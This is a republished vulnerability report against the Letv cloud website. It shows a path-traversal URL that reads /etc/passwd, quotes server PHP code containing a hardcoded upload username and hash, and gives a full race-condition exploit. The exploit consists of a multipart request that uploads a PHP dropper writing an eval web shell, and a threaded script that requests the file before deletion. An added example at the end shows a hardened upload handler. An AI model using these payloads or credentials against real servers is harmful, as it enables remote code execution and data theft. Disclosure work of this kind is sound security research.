Letv cloud main site getshell

Source: Internet
Author: User


The Letv cloud main site can be getshelled because of a permission design flaw in the code.

http://www.letvcloud.com/api/docdownload?filename=../../../../../../../../../../../etc/passwd allows any file to be downloaded.
 



Read this file: www/Home/Lib/Action/VideoAction.class.php

Starting from line 1
 

    } else {
        // only supports jpeg upload
        $max_file_size = 2000000; // The maximum size of the uploaded file is 2 MB. The unit is bytes
        if ($file['type'] != 'image/jpeg' && $file['type'] != 'image/pjpeg') {
            $error_message = "<font color='red'>images can only be in jpg format!</font>";
            echo '<script>(function(){parent.document.getElementById("' . $txtid . '").innerHTML="' . $error_message . '";})();</script>';
            exit;
        }
        if ($max_file_size < $file["size"]) {
            $error_message = "<font color='red'>the maximum file size should not exceed 2 MB!</font>";
            echo '<script>(function(){parent.document.getElementById("' . $txtid . '").innerHTML="' . $error_message . '";})();</script>';
            exit;
        }
    }
    $dest_folder = "Public/img/";
    if (!file_exists($dest_folder)) {
        mkdir($dest_folder);
    }
    $pinfo = pathinfo($file['name']);
    $newfilename = md5(time()) . "." . $pinfo['extension'];
    $destination = $dest_folder . $newfilename;
    if (move_uploaded_file($filename, $destination)) {
        $url = 'http://upload.letvcdn.com:8000/single_upload_tool.php';
        $data = array(
            "isphone" => "1",
            "username" => "isleju",
            "md5str" => "26f6c33c801913158424f7d3fbd6d0c3",
            "single_upload_submit" => "",
            "single_upload_file" => "@" . realpath($destination), // change the file name
            "single_upload_submit" => "OK"
        );
        $urldatajson = uploadByCURL($data, $url);
        $urldata = json_decode($urldatajson, true);
        unlink($destination);



The uploaded file is deleted with unlink() at the end. However, because the file is uploaded to another server in between, a time window is left during which the file still exists under Public/img/.

Using this time window, we can getshell.

First, the packet:
 

    POST /video/imgupload HTTP/1.1
    Host: www.letvcloud.com
    Proxy-Connection: keep-alive
    Content-Length: 450
    Cache-Control: max-age=0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Origin: http://www.letvcloud.com
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryGFLdcAPyYpQq380J
    Referer: http://www.letvcloud.com/video/edit/videoid/8682339
    Accept-Encoding: gzip,deflate
    Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4
    Cookie: LETVCLOUDID=705140aba5a3dc13e1222394352ade2b; Hm_lvt_984e73b4d6ff5ece34ec3da984ece290=1418609297; Hm_lpvt_984e73b4d6ff5ece34ec3da984ece290=1418631122

    ------WebKitFormBoundaryGFLdcAPyYpQq380J
    Content-Disposition: form-data; name="txtid"

    load_message
    ------WebKitFormBoundaryGFLdcAPyYpQq380J
    Content-Disposition: form-data; name="headImg"

    headImg
    ------WebKitFormBoundaryGFLdcAPyYpQq380J
    Content-Disposition: form-data; name="upfile"; filename="test§1§.php"
    Content-Type: image/jpeg

    <?php fputs(fopen('f.php','w'),'<?php eval($_POST[f])?>');?>
    ------WebKitFormBoundaryGFLdcAPyYpQq380J--



If you open 20 threads and keep sending packets, PHP files are continuously generated and uploaded to other servers.

Use the following script
 

    <?php
    $url = "http://www.letvcloud.com/Public/img/" . md5(time()) . ".php";
    echo $url;
    file_get_contents($url);
    ?>



Run it with a higher thread count to send the requests.



If the uploaded PHP file is requested before it is deleted, it executes and writes a new PHP file, resulting in getshell.
 

 

Solution:

Filter
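
As an added example (not Letv's code and not part of the original report), one way to close the three weaknesses visible in the handler above: the type check on the client-supplied $file['type'], the extension taken from the client filename, and the predictable md5(time()) name inside the web-reachable Public/img/ directory. The function name store_jpeg_upload(), the $stagingDir parameter and the staging path in the usage comment are assumptions.

```php
<?php
// Added example, not Letv's code. store_jpeg_upload() and $stagingDir are
// hypothetical names; random_bytes() needs PHP 7 or later.

function store_jpeg_upload(array $file, string $stagingDir, int $maxBytes = 2000000): string
{
    $tmp = $file['tmp_name'] ?? '';
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK || !is_uploaded_file($tmp)) {
        throw new RuntimeException('upload failed');
    }
    // Measure the file on disk instead of trusting the client-reported size.
    if (filesize($tmp) > $maxBytes) {
        throw new RuntimeException('the maximum file size is 2 MB');
    }
    // Decide the type from the content. $file['type'] and the extension in
    // $file['name'] both come from the request and prove nothing.
    $info = @getimagesize($tmp);
    if ($info === false || $info[2] !== IMAGETYPE_JPEG) {
        throw new RuntimeException('images can only be in jpg format');
    }
    // Stage outside the document root, so the file has no URL during the
    // window between move_uploaded_file() and unlink().
    $staging = realpath($stagingDir);
    $docRoot = empty($_SERVER['DOCUMENT_ROOT']) ? false : realpath($_SERVER['DOCUMENT_ROOT']);
    if ($staging === false || !is_dir($staging)) {
        throw new RuntimeException('staging directory is missing');
    }
    if ($docRoot !== false && strpos($staging . '/', rtrim($docRoot, '/') . '/') === 0) {
        throw new RuntimeException('staging directory must be outside the web root');
    }
    // Server-chosen name: unpredictable, and always ".jpg" whatever was sent.
    $dest = $staging . '/' . bin2hex(random_bytes(16)) . '.jpg';
    if (!move_uploaded_file($tmp, $dest)) {
        throw new RuntimeException('could not store the upload');
    }
    return $dest;
}

// Caller: forward the staged file, then delete it even if forwarding fails.
// $path = store_jpeg_upload($_FILES['upfile'], '/var/spool/upload-staging'); // constructed path
// try     { /* forward $path to the storage server as the original code does */ }
// finally { unlink($path); }
```

getimagesize() only inspects the image header, so it rejects obviously wrong files but does not prove the content is harmless; the fixed extension and the staging directory outside the web root are what prevent the staged file from being executed.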
 
